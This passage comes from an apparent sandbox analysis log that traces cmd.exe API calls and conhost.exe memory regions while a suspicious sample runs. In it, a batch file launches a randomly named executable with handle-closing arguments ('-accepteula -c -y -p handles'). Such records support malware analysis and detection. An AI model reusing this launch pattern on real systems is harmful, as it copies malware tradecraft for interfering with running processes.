lpNumberOfCharsWritten=0xfcee90*=0x2) returned 1 [0273.528] GetConsoleTitleW (in: lpConsoleTitle=0xfce9b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0273.528] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0273.528] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0273.529] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0273.530] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0273.530] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0273.530] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0273.530] SetErrorMode (uMode=0x0) returned 0x0 [0273.530] SetErrorMode (uMode=0x1) returned 0x0 [0273.530] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x125bdf8, lpFilePart=0xfce4c4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfce4c4*="Desktop") returned 0x1d [0273.530] SetErrorMode (uMode=0x0) returned 0x1 [0273.530] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0273.530] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0273.530] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0273.530] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.530] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xfce270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce270) returned 0x125a850 [0273.530] FindClose (in: hFindFile=0x125a850 | out: hFindFile=0x125a850) returned 1 [0273.530] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0273.530] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0273.530] GetConsoleTitleW (in: lpConsoleTitle=0xfce744, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0273.531] InitializeProcThreadAttributeList (in: lpAttributeList=0xfce670, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xfce654 | out: lpAttributeList=0xfce670, lpSize=0xfce654) returned 1 [0273.531] UpdateProcThreadAttribute (in: lpAttributeList=0xfce670, dwFlags=0x0, Attribute=0x60001, lpValue=0xfce65c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xfce670, lpPreviousValue=0x0) returned 1 [0273.531] GetStartupInfoW (in: lpStartupInfo=0xfce6a8 | out: lpStartupInfo=0xfce6a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"alf", _MaxCount=0x7) returned -3 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0273.531] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0273.532] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0273.532] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0273.532] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0273.532] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0273.532] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xfce5f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xfce644 | out: lpCommandLine="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", lpProcessInformation=0xfce644*(hProcess=0xb8, hThread=0xcc, dwProcessId=0x708, dwThreadId=0x120)) returned 1 [0273.538] CloseHandle (hObject=0xcc) returned 1 [0273.538] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0273.538] GetEnvironmentStringsW () returned 0x125cdc8* [0273.538] FreeEnvironmentStringsA (penv="=") returned 1 [0273.538] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0278.684] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xfce5dc | out: lpExitCode=0xfce5dc*=0x1) returned 1 [0278.684] CloseHandle (hObject=0xb8) returned 1 [0278.684] _vsnwprintf (in: _Buffer=0xfce6c4, _BufferCount=0x13, _Format="%08X", _ArgList=0xfce5e4 | out: _Buffer="00000001") returned 8 [0278.684] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0278.684] GetEnvironmentStringsW () returned 0x125cdc8* [0278.684] FreeEnvironmentStringsA (penv="=") returned 1 [0278.684] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0278.684] GetEnvironmentStringsW () returned 0x125cdc8* [0278.684] FreeEnvironmentStringsA (penv="=") returned 1 [0278.684] DeleteProcThreadAttributeList (in: lpAttributeList=0xfce670 | out: lpAttributeList=0xfce670) [0278.684] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.684] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0278.818] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.818] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0278.818] _get_osfhandle (_FileHandle=0) returned 0x38 [0278.818] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0278.818] SetConsoleInputExeNameW () returned 0x1 [0278.818] GetConsoleOutputCP () returned 0x1b5 [0278.818] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0278.818] SetThreadUILanguage (LangId=0x0) returned 0x409 [0278.819] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcefa4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0278.819] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0278.819] _get_osfhandle (_FileHandle=3) returned 0xb8 [0278.819] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0278.820] _get_osfhandle (_FileHandle=3) returned 0xb8 [0278.820] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0278.820] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcef74, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcef74*=0x0, lpOverlapped=0x0) returned 1 [0278.820] GetLastError () returned 0x0 [0278.820] _get_osfhandle (_FileHandle=3) returned 0xb8 [0278.820] GetFileType (hFile=0xb8) returned 0x1 [0278.820] _get_osfhandle (_FileHandle=3) returned 0xb8 [0278.820] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0278.820] _get_osfhandle (_FileHandle=3) returned 0xb8 [0278.820] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0278.820] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcef74, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcef74*=0x0, lpOverlapped=0x0) returned 1 [0278.820] GetLastError () returned 0x0 [0278.820] _get_osfhandle (_FileHandle=3) returned 0xb8 [0278.820] GetFileType (hFile=0xb8) returned 0x1 [0278.821] _get_osfhandle (_FileHandle=3) returned 0xb8 [0278.821] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0278.821] longjmp () [0278.821] _tell (_FileHandle=3) returned 226 [0278.821] _close (_FileHandle=3) returned 0 [0278.821] CmdBatNotificationStub () returned 0x1 [0278.821] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.821] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0278.821] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.821] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0278.821] _get_osfhandle (_FileHandle=0) returned 0x38 [0278.821] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0278.821] SetConsoleInputExeNameW () returned 0x1 [0278.821] GetConsoleOutputCP () returned 0x1b5 [0278.822] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0278.822] SetThreadUILanguage (LangId=0x0) returned 0x409 [0278.822] exit (_Code=1) Thread: id = 132 os_tid = 0x304 Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3c00f000" os_pid = "0x2b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x804" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1283 start_va = 0x7fddb000 end_va = 0x7fddbfff entry_point = 0x0 region_type = private name = "private_0x000000007fddb000" filename = "" Region: id = 1284 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1285 start_va = 0xd304eb0000 end_va = 0xd304ecffff entry_point = 0x0 region_type = private name = "private_0x000000d304eb0000" filename = "" Region: id = 1286 start_va = 0xd304ed0000 end_va = 0xd304ee3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d304ed0000" filename = "" Region: id = 1287 start_va = 0xd304ef0000 end_va = 0xd304f2ffff entry_point = 0x0 region_type = private name = "private_0x000000d304ef0000" filename = "" Region: id = 1288 start_va = 0x7df5ff190000 end_va = 0x7ff5ff18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff190000" filename = "" Region: id = 1289 start_va = 0x7ff7fc4a0000 end_va = 0x7ff7fc4c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc4a0000" filename = "" Region: id = 1290 start_va = 0x7ff7fc4c9000 end_va = 0x7ff7fc4c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc4c9000" filename = "" Region: id = 1291 start_va = 0x7ff7fc4ce000 end_va = 0x7ff7fc4cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc4ce000" filename = "" Region: id = 1292 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1293 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1294 start_va = 0xd304eb0000 end_va = 0xd304ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d304eb0000" filename = "" Region: id = 1295 start_va = 0xd304f30000 end_va = 0xd304fedfff entry_point = 0xd304f30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1296 start_va = 0xd305110000 end_va = 0xd30520ffff entry_point = 0x0 region_type = private name = "private_0x000000d305110000" filename = "" Region: id = 1297 start_va = 0x7ff7fc3a0000 end_va = 0x7ff7fc49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc3a0000" filename = "" Region: id = 1298 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1299 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1300 start_va = 0xd304ff0000 end_va = 0xd30502ffff entry_point = 0x0 region_type = private name = "private_0x000000d304ff0000" filename = "" Region: id = 1301 start_va = 0x7ff7fc4cc000 end_va = 0x7ff7fc4cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc4cc000" filename = "" Region: id = 1302 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1303 start_va = 0xd304ec0000 end_va = 0xd304ec6fff entry_point = 0x0 region_type = private name = "private_0x000000d304ec0000" filename = "" Region: id = 1304 start_va = 0xd305030000 end_va = 0xd305030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d305030000" filename = "" Region: id = 1305 start_va = 0xd305040000 end_va = 0xd305046fff entry_point = 0x0 region_type = private name = "private_0x000000d305040000" filename = "" Region: id = 1306 start_va = 0xd3053a0000 end_va = 0xd3053affff entry_point = 0x0 region_type = private name = "private_0x000000d3053a0000" filename = "" Region: id = 1307 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1308 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1309 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1310 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1311 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1312 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1313 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1314 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1315 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1316 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1317 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 